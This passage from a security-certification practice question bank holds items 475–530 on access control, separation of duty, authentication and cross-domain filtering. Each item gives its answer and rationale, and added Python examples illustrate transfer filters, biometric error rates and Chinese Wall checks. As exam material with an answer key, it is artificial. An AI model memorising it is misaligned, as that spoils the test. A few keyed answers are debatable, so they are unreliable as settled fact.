C. Proof-by-property is where a claimant authenticates his identity to a verifier by the use of a biometric sample such as fingerprints (i.e., something you are). Proof-by-possession and proof-by-knowledge, along with proof-by-property, are used in mobile device authentication and robust authentication. Proof-of-origin is the basis to prove an assertion. For example, a private signature key is used to generate digital signatures as a proof-of-origin.
475
Which of the following actions is effective for reviewing guest/anonymous accounts, temporary accounts, inactive accounts, and emergency accounts? a. Disabling b. Auditing c. Notifying d. Terminating
B. All the accounts mentioned in the question can be disabled, notified about, or terminated, but those are one-time actions, not a review. Auditing of account creation, modification, notification, disabling, and termination (i.e., the entire account cycle) is effective for review because it can identify anomalies in the account cycle process.
476
Regarding access enforcement, which of the following mechanisms should not be employed when an immediate response is necessary to ensure public and environmental safety? a. Dual cable b. Dual authorization c. Dual use certificate d. Dual backbone
B. Dual authorization mechanisms require two forms of approval to execute. The organization should not employ a dual authorization mechanism when an immediate response is necessary to ensure public and environmental safety because it could slow down the needed response. The other three choices are appropriate when an immediate response is necessary.
477
Which of the following is not an example of nondiscretionary access control? a. Identity-based access control b. Mandatory access control c. Role-based access control d. Temporal constraints
A. Nondiscretionary access control policies have rules that are not established at the discretion of the user. These controls can be changed only through administrative action and not by users. An identity-based access control (IBAC) decision grants or denies a request based on the presence of an entity on an access control list (ACL). IBAC and discretionary access control are considered equivalent and are not examples of nondiscretionary access controls. The other three choices are examples of nondiscretionary access controls. Mandatory access control deals with rules, role-based access control deals with job titles and functions, and temporal constraints deal with time-based restrictions and control time-sensitive activities.
478
Encryption is used to reduce the probability of unauthorized disclosure and changes to information when a system is in which of the following secure, non-operable system states? a. Troubleshooting b. Offline for maintenance c. Boot-up d. Shutdown
B. Secure, non-operable system states are states in which the information system is not performing business-related processing. These states include offline for maintenance, troubleshooting, bootup, and shutdown. Offline data should be stored with encryption in a secure location. Removing information from online storage to offline storage eliminates the possibility of individuals gaining unauthorized access to that information via a network.
479
Bitmap objects and textual objects are part of which of the following security policy filters? a. File type checking filters b. Metadata content filters c. Unstructured data filters d. Hidden content filters
C. Unstructured data consists of two basic categories: bitmap objects (e.g., image, audio, and video files) and textual objects (e.g., emails and spreadsheets). Security policy filters include file type checking filters, dirty word filters, structured and unstructured data filters, metadata content filters, and hidden content filters.
480
Information flow control enforcement employing rulesets to restrict information system services provides: 1. Structured data filters 2. Metadata content filters 3. Packet filters 4. Message filters a. 1 and 2 b. 2 and 3 c. 3 and 4 d. 1, 2, 3, and 4
C. Packet filters are based on header information whereas message filters are based on content using keyword searches. Both packet filters and message filters use rulesets. Structured data filters and metadata content filters do not use rulesets.
481
For information flow enforcement, what are explicit security attributes used to control? a. Release of sensitive data b. Data content c. Data structure d. Source objects
A. Information flow enforcement using explicit security attributes is used to control the release of certain types of information, such as sensitive data. Data content, data structure, and source and destination objects are examples of implicit security attributes.
482
What do policy enforcement mechanisms, used to transfer information between different security domains prior to transfer, include? 1. Embedding rules 2. Release rules 3. Filtering rules 4. Sanitization rules a. 1 and 2 b. 2 and 3 c. 3 and 4 d. 1, 2, 3, and 4
C. Policy enforcement mechanisms include the filtering and/or sanitization rules that are applied to information prior to transfer to a different security domain. Embedding rules and release rules do not handle information transfer.
483
Which of the following is not an example of policy rules for cross domain transfers? a. Prohibiting more than two-levels of embedding b. Facilitating policy decisions on source and destination c. Prohibiting the transfer of archived information d. Limiting embedded components within other components
B. Parsing transfer files facilitates policy decisions on source, destination, certificates, classification subject, or attachments. The other three choices are examples of policy rules for cross domain transfers.
484
Which of the following are the ways to reduce the range of potential malicious content when transferring information between different security domains? 1. Constrain file lengths 2. Constrain character sets 3. Constrain schemas 4. Constrain data structures a. 1 and 3 b. 2 and 3 c. 3 and 4 d. 1, 2, 3, and 4
D. The information system, when transferring information between different security domains, implements security policy filters that constrain file lengths, character sets, schemas, data structures, and allowed enumerations to reduce the range of potential malicious and/or unsanctioned content.
485
Which of the following cannot detect unsanctioned information and prohibit the transfer of such information between different security domains (i.e., domain-type enforcement)? a. Implementing one-way flows b. Checking information for malware c. Implementing dirty word list searches d. Applying security attributes to metadata
A. One-way flows are implemented using hardware mechanisms for controlling the flow of information within a system and between interconnected systems. As such they cannot detect unsanctioned information. The other three choices do detect unsanctioned information and prohibit the transfer with actions such as checking all transferred information for malware, implementing dirty word list searches on transferred information, and applying security attributes to metadata that are similar to information payloads.
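The security policy filters named in the last few questions (unstructured data filters, constraints on file length, character set, schema, data structure and allowed enumerations, and dirty word list searches) are easiest to understand as one gate a file must pass before it crosses to the other domain. Here is an added Python example of such a gate, not part of the original question set; the policy values, the JSON record format and the dirty word list are constructed for illustration.

```python
import json
import re

# Constructed policy for the example; a real cross-domain solution loads these from its ruleset.
MAX_FILE_LENGTH = 4096                                      # constrain file lengths
ALLOWED_CHARS = re.compile(r"[\x20-\x7E\t\r\n]*")            # constrain character set: printable ASCII
SCHEMA = {"id": int, "classification": str, "body": str}     # constrain schema / data structure
ALLOWED_CLASSIFICATIONS = {"UNCLASSIFIED", "CONFIDENTIAL"}  # allowed enumerations for the low side
DIRTY_WORDS = ("PROJECT BLUEBIRD", "SECRET")                # dirty word list searched in the payload


def filter_transfer(raw: bytes) -> tuple:
    """Security policy filter applied before a file crosses to the lower domain.

    Returns (allowed, violations). Structural failures that make later checks meaningless
    (undecodable text, unparsable JSON, wrong schema) stop immediately; independent content
    checks are all recorded so the audit log shows every reason the transfer was refused.
    """
    violations = []
    if len(raw) > MAX_FILE_LENGTH:
        violations.append("file length")
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return False, violations + ["character set"]
    if not ALLOWED_CHARS.fullmatch(text):
        violations.append("character set")
    try:
        obj = json.loads(text)
    except json.JSONDecodeError:
        return False, violations + ["data structure"]
    if (not isinstance(obj, dict) or set(obj) != set(SCHEMA)
            or any(not isinstance(obj[k], t) for k, t in SCHEMA.items())):
        return False, violations + ["schema"]
    if obj["classification"] not in ALLOWED_CLASSIFICATIONS:
        violations.append("enumeration")
    if any(word in obj["body"].upper() for word in DIRTY_WORDS):
        violations.append("dirty word")
    return not violations, violations


if __name__ == "__main__":
    # Constructed sample transfers.
    samples = [
        b'{"id": 1, "classification": "UNCLASSIFIED", "body": "weekly status"}',
        b'{"id": 2, "classification": "TOP SECRET", "body": "weekly status"}',
        b'{"id": 3, "classification": "UNCLASSIFIED", "body": "re: Project Bluebird timeline"}',
        '{"id": 4, "classification": "UNCLASSIFIED", "body": "caf\u00e9"}'.encode("utf-8"),
        b"not a record at all",
    ]
    for s in samples:
        print(filter_transfer(s))
```

Note what the filter cannot do, which is the point of the one-way flow question: a hardware one-way link decides direction, not content, so a gate like this has to sit in front of it.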
486
Which of the following binds security attributes to information to facilitate information flow policy enforcement? a. Security labels b. Resolution labels c. Header labels d. File labels
B. Means to bind and enforce the information flow include resolution labels that distinguish between information systems and their specific components, and between individuals involved in preparing, sending, receiving, or disseminating information. The other three types of labels cannot bind security attributes to information.
487
Which of the following access enforcement mechanisms provides increased information security for an organization? a. Access control lists b. Business application system c. Access control matrices d. Cryptography
B. Normal access enforcement mechanisms include access control lists, access control matrices, and cryptography. Increased information security is provided at the business application system level (e.g., accounting and marketing systems) because the application adds its own password or PIN check on top of those mechanisms.
488
What do policies about information on interconnected systems include? 1. Implementing access-only mechanisms 2. Implementing one-way transfer mechanisms 3. Employing hardware mechanisms to provide unitary flow directions 4. Implementing regrading mechanisms to reassign security attributes a. 1 only b. 2 only c. 3 only d. 1, 2, 3, and 4
D. Specific architectural security solutions can reduce the potential for undiscovered vulnerabilities. These solutions include all four items mentioned.
489
From an access control point of view, separation of duty is of two types: static and dynamic. Which of the following are examples of static separation of duties? 1. Role-based access control 2. Workflow policy 3. Rule-based access control 4. Chinese Wall policy a. 1 and 2 b. 1 and 3 c. 2 and 4 d. 3 and 4
B. Separation of duty constraints require that two roles be mutually exclusive because no user should have the privileges from both roles. Both role-based and rule-based access controls are examples of static separation of duty. Dynamic separation of duty is enforced at access time, and the decision to grant access refers to the past access history. Examples of dynamic separation of duty include workflow policy and the Chinese Wall policy.
490
In biometrics-based identification and authentication techniques, which of the following statements are true about biometric errors? 1. High false rejection rate is preferred. 2. Low false acceptance rate is preferred. 3. High crossover error rate represents low accuracy. 4. Low crossover error rate represents low accuracy. a. 1 and 3 b. 1 and 4 c. 2 and 3 d. 2 and 4
C. The goal of biometrics-based identification and authentication techniques with respect to biometric errors is to obtain low numbers for both the false rejection rate and the false acceptance rate. A related goal is a low crossover error rate (the point where the two rates are equal), because a low crossover error rate represents high accuracy and a high crossover error rate represents low accuracy.
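The relationship between false acceptance rate, false rejection rate and the crossover error rate is clearest when computed. Here is an added Python example, not part of the original question set, that derives all three from matcher scores and picks the operating point a high-security deployment would choose; the genuine and impostor score lists are constructed for illustration.

```python
# Constructed matcher scores (higher = more similar). In a real system these come from
# comparing probe samples against enrolled templates.
GENUINE = [0.55, 0.62, 0.68, 0.71, 0.75, 0.80, 0.83, 0.88, 0.91, 0.95]   # same person
IMPOSTOR = [0.10, 0.18, 0.25, 0.31, 0.38, 0.44, 0.52, 0.58, 0.63, 0.70]  # different people
THRESHOLDS = [i / 100 for i in range(101)]


def far_frr(genuine, impostor, threshold):
    """Accept when score >= threshold.
    FAR (Type II error) = impostors wrongly accepted; FRR (Type I error) = genuine users wrongly rejected."""
    far = sum(s >= threshold for s in impostor) / len(impostor)
    frr = sum(s < threshold for s in genuine) / len(genuine)
    return far, frr


def crossover_error_rate(genuine, impostor, thresholds):
    """CER (also called EER): the threshold where FAR and FRR are closest to equal.
    Returns (threshold, far, frr); a lower CER means a more accurate system."""
    best = None
    for t in thresholds:
        far, frr = far_frr(genuine, impostor, t)
        if best is None or abs(far - frr) < abs(best[1] - best[2]):
            best = (t, far, frr)
    return best


def threshold_for_max_far(genuine, impostor, thresholds, max_far):
    """Operating point for a high-security system: the lowest threshold whose FAR <= max_far,
    accepting the higher FRR (more legitimate users inconvenienced) that comes with it."""
    for t in thresholds:
        far, frr = far_frr(genuine, impostor, t)
        if far <= max_far:
            return t, far, frr
    return None


if __name__ == "__main__":
    print("CER:", crossover_error_rate(GENUINE, IMPOSTOR, THRESHOLDS))          # (0.63, 0.2, 0.2)
    print("FAR=0 point:", threshold_for_max_far(GENUINE, IMPOSTOR, THRESHOLDS, 0.0))  # (0.71, 0.0, 0.3)
```

Raising the threshold drives FAR down and FRR up; the CER is the single number that lets two systems be compared independently of where each is tuned, which is why a high CER means low accuracy regardless of the chosen operating point.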
491
For password management, user-selected passwords generally contain which of the following? 1. Less entropy 2. Easier for users to remember 3. Weaker passwords 4. Easier for attackers to guess a. 2 only b. 2 and 3 c. 2, 3, and 4 d. 1, 2, 3, and 4
D. User-selected passwords generally contain less entropy, are easier for users to remember, are weaker, and at the same time are easier for attackers to guess or crack.
492
As a part of centralized password management solution, which of the following architectures for single sign-on technology becomes a single point-of-failure? a. Kerberos authentication service b. Lightweight directory access protocol c. Domain passwords d. Centralized authentication server
D. A common architecture for single sign-on (SSO) is to have an authentication service, such as Kerberos, for authenticating SSO users, and a database or directory service such as lightweight directory access protocol (LDAP) that stores authentication information for the resources the SSO handles authentication for. By definition, the SSO technology uses a password, and an SSO solution usually includes one or more centralized servers containing authentication credentials for many users. Such a server becomes a single point-of-failure for authentication to many resources, so the availability of the server affects the availability of all the resources that rely on that server.
493
If proper mutual authentication is not performed, what is the single sign-on technology vulnerable to? a. Man-in-the-middle attack b. Replay attack c. Social engineering attack d. Phishing attack
A. User authentication to the single sign-on (SSO) technology is important. If proper mutual authentication is not performed, the SSO technology using passwords is vulnerable to a man-in-the-middle (MitM) attack, because the user cannot tell the genuine SSO server from an impostor that relays the password. Social engineering and phishing attacks target the user and the password directly rather than exploiting a gap in the protocol, and replay attacks are addressed by freshness mechanisms such as nonces and timestamps rather than by mutual authentication.
494
From an access control point of view, separation of duty is of two types: static and dynamic. Which of the following are examples of dynamic separation of duties? 1. Two-person rule 2. History-based separation of duty 3. Design-time 4. Run-time a. 1 and 2 b. 1 and 3 c. 2 and 4 d. 3 and 4
A. The two-person rule states that the first user can be any authorized user, but the second user can be any authorized user different from the first. History-based separation of duty regulates that the same subject (role or user) cannot access the same object (program or device) for a variable number of times. Design-time and run-time are used in the workflow policy.
495
From an access control point of view, the Chinese Wall policy focuses on which of the following? a. Confidentiality b. Integrity c. Availability d. Assurance
A. The Chinese Wall policy is used where company sensitive information (i.e., confidentiality) is divided into mutually disjoint conflict-of-interest categories. The Biba model focuses on integrity. Availability, assurance, and integrity are other components of security principles that are not relevant to the Chinese Wall policy.
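The static/dynamic separation of duty question, the two-person rule and the Chinese Wall question above describe three enforcement points: role assignment, the approval step, and the access decision itself. As an added Python example that is not part of the original question set, here are all three; the role names, company names and conflict-of-interest classes are constructed for illustration.

```python
# Static separation of duty: conflicting roles are declared mutually exclusive and the
# constraint is enforced when roles are assigned (design time), before any access happens.
MUTUALLY_EXCLUSIVE_ROLES = {
    frozenset({"check_requester", "check_signer"}),   # the fraud example from the SOD question
    frozenset({"developer", "production_deployer"}),
}


def can_assign_role(current_roles: set, new_role: str) -> bool:
    """Refuse any assignment that would give one user both halves of an exclusive pair."""
    for pair in MUTUALLY_EXCLUSIVE_ROLES:
        if new_role in pair and (pair - {new_role}) & current_roles:
            return False
    return True


def two_person_rule(first_approver: str, second_approver: str, authorized: set) -> bool:
    """Dynamic SOD at the approval step: both approvers must be authorized, and the second
    must be a different person from the first."""
    return (first_approver in authorized and second_approver in authorized
            and first_approver != second_approver)


class ChineseWall:
    """Dynamic separation of duty at access time: the decision depends on the subject's history.

    Companies are grouped into conflict-of-interest classes; once a subject has read data
    belonging to one company in a class, every other company in that class is off limits.
    """

    def __init__(self, conflict_classes: dict):
        self.coi = conflict_classes            # company -> conflict-of-interest class
        self.history = {}                      # subject -> set of companies already accessed

    def request(self, subject: str, company: str) -> bool:
        seen = self.history.setdefault(subject, set())
        if company in seen:                    # re-reading the same company is always fine
            return True
        wall = self.coi[company]
        if any(self.coi[other] == wall for other in seen):
            return False                       # conflicting company on the other side of the wall
        seen.add(company)                      # grant and record; this changes future decisions
        return True


if __name__ == "__main__":
    print(can_assign_role({"check_requester"}, "check_signer"))   # False: static conflict
    print(two_person_rule("ann", "ann", {"ann", "bob"}))           # False: same person twice
    wall = ChineseWall({"BankA": "banking", "BankB": "banking", "OilCo": "oil"})
    print(wall.request("ann", "BankA"), wall.request("ann", "OilCo"), wall.request("ann", "BankB"))
    # True True False: BankB is in the same conflict class as BankA, which ann already read
```

The contrast the question draws is visible in the code: `can_assign_role` needs no runtime state and can be checked once, while `ChineseWall.request` cannot be decided without the `history` it builds as accesses are granted.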
496
From an access control point of view, which of the following maintains consistency between the internal data and users’ expectations of that data? a. Security policy b. Workflow policy c. Access control policy d. Chinese Wall policy
B. The goal of workflow policy is to maintain consistency between the internal data and external (users’) expectations of that data. This is because the workflow is a process, consisting of tasks, documents, and data. The Chinese Wall policy deals with dividing sensitive data into separate categories. The security policy and the access control policy are too general to be of any importance here.
497
From an access control point of view, separation of duty is not related to which of the following? a. Safety b. Reliability c. Fraud d. Security
B. Computer systems must be designed and developed with security and safety in mind because insecure and unsafe systems can cause injury to people and damage to assets (e.g., military and airline systems). With separation of duty (SOD), fraud can be minimized when sensitive tasks are separated from each other (e.g., signing a check from requesting a check). Reliability is more of an engineering term in that a computer system is expected to perform with the required precision on a consistent basis. On the other hand, SOD deals with people and their work-related actions, which are not precise and consistent.
498
Which of the following statements are true about access controls, safety, trust, and separation of duty? 1. No leakage of access permissions are allowed to an unauthorized principal. 2. No access privileges can be escalated to an unauthorized principal. 3. No principals’ trust means no safety. 4. No separation of duty means no safety. a. 1 only b. 2 only c. 1, 2, and 3 d. 1, 2, 3, and 4
D. If complete trust by a principal is not practical, there is a possibility of a safety violation. The separation of duty concept is used to enforce safety and security in some access control models. In an event where there are many users (subjects), objects, and relations between subjects and objects, safety needs to be carefully considered.
499
From a safety configuration viewpoint, the separation of duty concept is not enforced in which of the following? a. Mandatory access control policy b. Bell-LaPadula access control model c. Access control matrix model d. Domain type enforcement access control model
C. The separation of duty concept is not enforced by the access control matrix model because it is not safety configured and is based on an arbitrary constraint. The other three choices use restricted access control models with access constraints that describe the safety requirements of any configuration.
500
The purpose of static separation of duty is to address problems, such as static exclusivity and the assurance principle. Which of the following refers to the static exclusivity problem? 1. To reduce the likelihood of fraud. 2. To prevent the loss of user objectivity. 3. One user is less likely to commit fraud when this user is a part of many users involved in a business transaction. 4. Few users are less likely to commit collusion when these users are a part of many users involved in a business transaction. a. 1 and 2 b. 2 and 3 c. 3 and 4 d. 1, 2, 3, and 4
A. A static exclusivity problem is the condition for which it is considered dangerous for any user to gain authorization for a conflicting set of access capabilities. The motivation for exclusivity relations includes reducing the likelihood of fraud or preventing the loss of user objectivity. The assurance principle deals with committing fraud or collusion when many users are involved in handling a business transaction.
501
Role-based access control and the least privilege principle do not enable which of the following? a. Read access to a specified file b. Write access to a specified directory c. Connect access to a given host computer d. One administrator with super-user access permissions
D. The concept of limiting access or least privilege is simply to provide no more authorization than necessary to perform required functions. Best practice suggests it is better to have several administrators with limited access to security resources rather than one administrator with super-user access permissions. The principle of least privilege is connected to the role-based access control in that each role is assigned those access permissions needed to perform its functions, as mentioned in the other three choices.
502
From an access control viewpoint, which of the following requires an audit the most? a. Public access accounts b. Nonpublic accounts c. Privileged accounts d. Non-privileged accounts
C. The goal is to limit exposure due to operating from within a privileged account or role. A change of role for a user or process should provide the same degree of assurance in the change of access authorizations for that user or process. The same degree of assurance is also needed when a change between a privileged account and a non-privileged account takes place. Auditing of privileged accounts is required mostly to ensure that privileged account users use only the privileged accounts and that non-privileged account users use only the non-privileged accounts. An audit is not required for public access accounts due to little or no risk involved. Privileged accounts are riskier than nonpublic accounts.
503
From an information flow policy enforcement viewpoint, which of the following allows forensic reconstruction of events? 1. Security attributes 2. Security policies 3. Source points 4. Destination points a. 1 and 2 b. 2 and 3 c. 3 and 4 d. 1, 2, 3, and 4
C. The ability to identify source and destination points for information flowing in an information system allows for forensic reconstruction of events and increases compliance to security policies. Security attributes are critical components of the operations security concept.
504
From an access control policy enforcement viewpoint, which of the following should not be given a privileged user account to access security functions during the course of normal operations? 1. Network administration department 2. Security administration department 3. End user department 4. Internal audit department a. 1 and 2 b. 3 only c. 4 only d. 3 and 4
D. Privileged user accounts should be established and administered in accordance with a role-based access scheme to access security functions. Privileged roles include network administration, security administration, system administration, database administration, and Web administration, and should be given access to security functions. End users and internal auditors should not be given a privileged account to access security functions during the course of normal operations.
505
From an access control account management point of view, service-oriented architecture implementations rely on which of the following? a. Dynamic user privileges b. Static user privileges c. Predefined user privileges d. Dynamic user identities
A. Service-oriented architecture (SOA) implementations rely on run-time access control decisions facilitated by dynamic privilege management. In contrast, conventional access control implementations employ static information accounts and predefined sets of user privileges. Although user identities remain relatively constant over time, user privileges may change more frequently based on the ongoing business requirements and operational needs of the organization.
506
For privilege management, which of the following is the correct order? a. Access control⇒Access management⇒Authentication management⇒Privilege management b. Access management⇒Access control⇒Privilege management⇒Authentication management c. Authentication management⇒Privilege management⇒Access control⇒Access management d. Privilege management⇒Access management⇒Access control⇒Authentication management
C. Privilege management is defined as a process that creates, manages, and stores the attributes and policies needed to establish criteria that can be used to decide whether an authenticated entity’s request for access to some resource should be granted. Authentication management deals with identities, credentials, and any other authentication data needed to establish an identity. Access management, which includes privilege management and access control, encompasses the science and technology of creating, assigning, storing, and accessing attributes and policies. These attributes and policies are used to decide whether an entity’s request for access should be allowed or denied. In other words, a typical access decision starts with authentication management and ends with access management, whereas privilege management falls in between.
507
From an access control viewpoint, which of the following are examples of super user accounts? a. Root and guest accounts b. Administrator and root accounts c. Anonymous and root accounts d. Temporary and end-user accounts
B. Super user accounts are typically described as administrator or root accounts. Access to super user accounts should be limited to designated security and system administration staff only, and not to the end-user accounts, guest accounts, anonymous accounts, or temporary accounts. Security and system administration staff use the super user accounts to access key security/system parameters and commands.
508
Responses to unsuccessful login attempts and session locks are implemented with which of the following? a. Operating system and firmware b. Application system and hardware c. Operating system and application system d. Hardware and firmware
C. Response to unsuccessful login attempts can be implemented at both the operating system and the application system levels. The session lock is implemented typically at the operating system level but may be at the application system level. Hardware and firmware are not used for unsuccessful login attempts and session lock.
509
Which of the following statements is not true about a session lock in access control? a. A session lock is a substitute for logging out of the system. b. A session lock can be activated on a device with a display screen. c. A session lock places a publicly viewable pattern on to the device display screen. d. A session lock hides what was previously visible on the device display screen.
A. A session lock prevents further access to an information system after a defined time period of inactivity. A session lock is not a substitute for logging out of the system as in logging out at the end of the workday. The other three choices are true statements about a session lock.
510
Which of the following user actions are permitted without identification or authentication? 1. Access to public websites 2. Emergency situations 3. Unsuccessful login attempts 4. Reestablishing a session lock a. 1 only b. 2 only c. 1 and 2 d. 3 and 4
C. Access to public websites and emergency situations are examples of user-permitted actions that don't require identification or authentication. Both unsuccessful login attempts and reestablishing a session lock require proper identification or authentication procedures. A session lock is retained until proper identification or authentication is submitted, accepted, and reestablished.
511
Which of the following circumstances require additional security protections for mobile devices after unsuccessful login attempts? a. When a mobile device requires a login to itself, and not a user account on the device b. When a mobile device is accessing a removable media without a login c. When information on the mobile device is encrypted d. When the login is made to any one account on the mobile device
A. Additional security protection is needed for a mobile device (e.g., PDA) requiring a login where the login is made to the mobile device itself, not to any one account on the device. Additional protection is not needed when removable media is accessed without a login and when the information on the mobile device is encrypted. A successful login to any account on the mobile device resets the unsuccessful login count to zero.
512
An information system dynamically reconfigures with which of the following as information is created and combined? a. Security attributes and data structures b. Security attributes and security policies c. Security attributes and information objects d. Security attributes and security labels
B. An information system dynamically reconfigures security attributes in accordance with an identified security policy as information is created and combined. The system supports and maintains the binding of security attributes to information in storage, in process, and in transmission. The term security label is often used to associate a set of security attributes with a specific information object as part of the data structures (e.g., records, buffers, and files) for that object.
513
For identity management, international standards do not use which of the following access control policies for making access control decisions? 1. Discretionary access control (DAC) 2. Mandatory access control (MAC) 3. Identity-based access control (IBAC) 4. Rule-based access control (RuBAC) a. 1 and 2 b. 1 and 3 c. 2 and 3 d. 3 and 4
A. International standards for access control decisions do not use the U.S.-based discretionary or mandatory access control policies. Instead, they use identity-based and rule-based access control policies.
514
Which of the following is an example of less than secure networking protocols for remote access sessions? a. Secure shell-2 b. Virtual private network with blocking mode enabled c. Bulk encryption d. Peer-to-peer networking protocols
D. An organization must ensure that remote access sessions for accessing security functions employ security measures and that they are audited. Bulk encryption, session layer encryption, secure shell-2 (SSH-2), and virtual private networking (VPN) with blocking enabled are standard security measures. Bluetooth and peer-to-peer (P2P) networking are examples of less than secure networking protocols.
515
For wireless access, in which of the following ways does an organization confine wireless communications to organization controlled boundaries? 1. Reducing the power of the wireless transmission and controlling wireless emanations 2. Configuring the wireless access path such that it is point-to-point in nature 3. Using mutual authentication protocols 4. Scanning for unauthorized wireless access points and connections a. 1 only b. 3 only c. 2 and 4 d. 1, 2, 3, and 4
D. Actions that may be taken to confine wireless communication to organization-controlled boundaries include all four of the items mentioned. Mutual authentication protocols include EAP/TLS and PEAP. Reducing the power of the wireless transmission means that the transmission cannot go beyond the physical perimeter of the organization. It also includes installing TEMPEST measures to control emanations.
516
For access control for mobile devices, which of the following assigns responsibility and accountability for addressing known vulnerabilities in the media? a. Use of writable, removable media b. Use of personally owned removable media c. Use of project-owned removable media d. Use of nonowner removable media
C. An identifiable owner (e.g., employee, organization, or project) for removable media helps to reduce the risk of using such technology by assigning responsibility and accountability for addressing known vulnerabilities in the media (e.g., malicious code insertion). Use of project-owned removable media is acceptable because the media is assigned to a project, and the other three choices are not acceptable because they have no accountability feature attached to them. Restricting the use of writable, removable media is a good security practice.
517
For access control for mobile devices, which of the following actions can trigger an incident response handling process? a. Use of external modems or wireless interfaces within the device b. Connection of unclassified mobile devices to unclassified systems c. Use of internal modems or wireless interfaces within the device d. Connection of unclassified mobile devices to classified systems
D. When unclassified mobile devices are connected to classified systems containing classified information, it is a risky situation because a security policy is violated. This action should trigger an incident response handling process. Connection of an unclassified mobile device to an unclassified system still requires an approval; although, it is less risky. Use of internal or external modems or wireless interfaces within the mobile device should be prohibited.
518
For least functionality, organizations utilize which of the following to identify and prevent the use of prohibited functions, ports, protocols, and services? 1. Network scanning tools 2. Intrusion detection and prevention systems 3. Firewalls 4. Host-based intrusion detection systems a. 1 and 3 b. 2 and 4 c. 3 and 4 d. 1, 2, 3, and 4
D. Organizations can utilize network scanning tools, intrusion detection and prevention systems (IDPS), endpoint protections such as firewalls, and host-based intrusion detection systems to identify and prevent the use of prohibited functions, ports, protocols, and services.
519
An information system uses multifactor authentication mechanisms to minimize potential risks for which of the following situations? 1. Network access to privileged accounts 2. Local access to privileged accounts 3. Network access to non-privileged accounts 4. Local access to non-privileged accounts a. 1 and 2 b. 1 and 3 c. 3 and 4 d. 1, 2, 3, and 4
D. An information system must use multifactor authentication mechanisms for both network access (privileged and non-privileged) and local access (privileged and non-privileged) because both situations are risky. System/network administrators have administrative (privileged) accounts, and these individuals have access to a set of “access rights” on a given system. Malicious non-privileged account users are as risky as privileged account users because they can cause damage to data and program files.
520
Which of the following statements is not true about identification and authentication requirements? a. Group authenticators should be used with an individual authenticator b. Group authenticators should be used with a unique authenticator c. Unique authenticators in group accounts need greater accountability d. Individual authenticators should be used at the same time as the group authenticators
D. You need to require that individuals are authenticated with an individual authenticator prior to using a group authenticator. The other three choices are true statements.
521
Which of the following can prevent replay attacks in an authentication process for network access to privileged and non-privileged accounts? 1. Nonces 2. Challenges 3. Time synchronous authenticators 4. Challenge-response one-time authenticators a. 1 and 2 b. 2 and 3 c. 3 and 4 d. 1, 2, 3, and 4
D. An authentication process resists replay attacks if it is impractical to achieve a successful authentication by recording and replaying a previous authentication message. Techniques used to address the replay attacks include protocols that use nonces or challenges (e.g., TLS) and time synchronous or challenge-response one-time authenticators.
522
For device identification and authentication, dynamic address allocation process for devices is standardized with which of the following? a. Dynamic host configuration protocol b. Dynamic authentication c. Dynamic hypertext markup language d. Dynamic binding
A. For dynamic address allocation for devices, dynamic host configuration protocol (DHCP)-enabled clients obtain leases for Internet Protocol (IP) addresses from DHCP servers. Therefore, the dynamic address allocation process for devices is standardized with DHCP. The other three choices do not have the capability to obtain leases for IP addresses.
523
For identifier management, service-oriented architecture implementations do not rely on which of the following? a. Dynamic identities b. Dynamic attributes and privileges c. Preregistered users d. Pre-established trust relationships
C. Conventional approaches to identification and authentication employ static information system accounts for known preregistered users. Service-oriented architecture (SOA) implementations do not rely on static identities but do rely on establishing identities at run-time for entities (i.e., dynamic identities) that were previously unknown. Dynamic identities are associated with dynamic attributes and privileges as they rely on pre-established trust relationships.
524
For authenticator management, which of the following presents a significant security risk? a. Stored authenticators b. Default authenticators c. Reused authenticators d. Refreshed authenticators
B. Organizations should change the default authenticators upon information system installation or require vendors and/or manufacturers to provide unique authenticators prior to delivery. This is because default authenticator credentials are often well known, easily discoverable, and present a significant security risk, and therefore, should be changed upon installation. A stored or embedded authenticator can be risky depending on whether it is encrypted or unencrypted. Both reused and refreshed authenticators are less risky compared to default and stored authenticators because they are under the control of the user organization.
525
For authenticator management, use of which of the following is risky and leads to possible alternatives? a. A single sign-on mechanism b. Same user identifier and different user authenticators on all systems c. Same user identifier and same user authenticator on all systems d. Different user identifiers and different user authenticators on each system
C. Examples of user identifiers include internal users, contractors, external users, guests, passwords, tokens, and biometrics. Examples of user authenticators include passwords, PINs, tokens, biometrics, PKI/digital certificates, and key cards. When an individual has accounts on multiple information systems, there is the risk that if one account is compromised and the individual uses the same user identifier and authenticator, other accounts will be compromised as well. Possible alternatives include (i) having the same user identifier but different authenticators on all systems, (ii) having different user identifiers and different user authenticators on each system, (iii) employing a single sign-on mechanism, or (iv) having one-time passwords on all systems.
526
For authenticator management, which of the following is the least risky situation when compared to the others? a. Authenticators embedded in an application system b. Authenticators embedded in access scripts c. Authenticators stored on function keys d. Identifiers created at run-time
D. It is less risky to dynamically manage identifiers, attributes, and access authorizations. Run-time identifiers are created on-the-fly for previously unknown entities. Information security management should ensure that unencrypted, static authenticators are not embedded in application systems or access scripts or not stored on function keys. This is because these approaches are risky. Here, the concern is to determine whether an embedded or stored authenticator is in the encrypted or unencrypted form.
527
Which of the following access authorization policies applies to when an organization has a list of software not authorized to execute on an information system? a. Deny-all, permit-by-exception b. Allow-all, deny-by-exception c. Allow-all, deny-by-default d. Deny-all, accept-by-permission
A. An organization employs a deny-all, permit-by-exception authorization policy to identify software not allowed to execute on the system. The other three choices are incorrect because the correct answer is based on a specific access authorization policy.
528
Encryption is a part of which of the following? a. Directive controls b. Preventive controls c. Detective controls d. Corrective controls
B. Encryption prevents unauthorized access and protects data and programs when they are in storage (at rest) or in transit. Preventive controls deter security incidents from happening in the first place. Directive controls are broad-based controls to handle security incidents, and they include management’s policies, procedures, and directives. Detective controls enhance security by monitoring the effectiveness of preventive controls and by detecting security incidents where preventive controls were circumvented. Corrective controls are procedures to react to security incidents and to take remedial actions on a timely basis. Corrective controls require proper planning and preparation as they rely more on human judgment.
529
Which of the following access authorization policies applies to external networks through managed interfaces employing boundary protection devices such as gateways or firewalls? a. Deny-all, permit-by-exception b. Allow-all, deny-by-exception c. Allow-all, deny-by-default d. Deny-all, accept-by-permission
A. Examples of managed interfaces employing boundary protection devices include proxies, gateways, routers, firewalls, hardware/software guards, and encrypted tunnels on a demilitarized zone (DMZ). The “deny-all, permit-by-exception” policy denies network traffic by default and enables network traffic by exception only. The other three choices are incorrect because the correct answer is based on a specific access authorization policy. Access control lists (ACLs) can be applied to traffic entering the internal network from external sources.
530
Which of the following are needed when the enforcement of normal security policies, procedures, and rules are difficult to implement? 1. Compensating controls 2. Close supervision 3. Team review of work 4. Peer review of work a. 1 only b. 2 only c. 1 and 2 d. 1, 2, 3, and 4
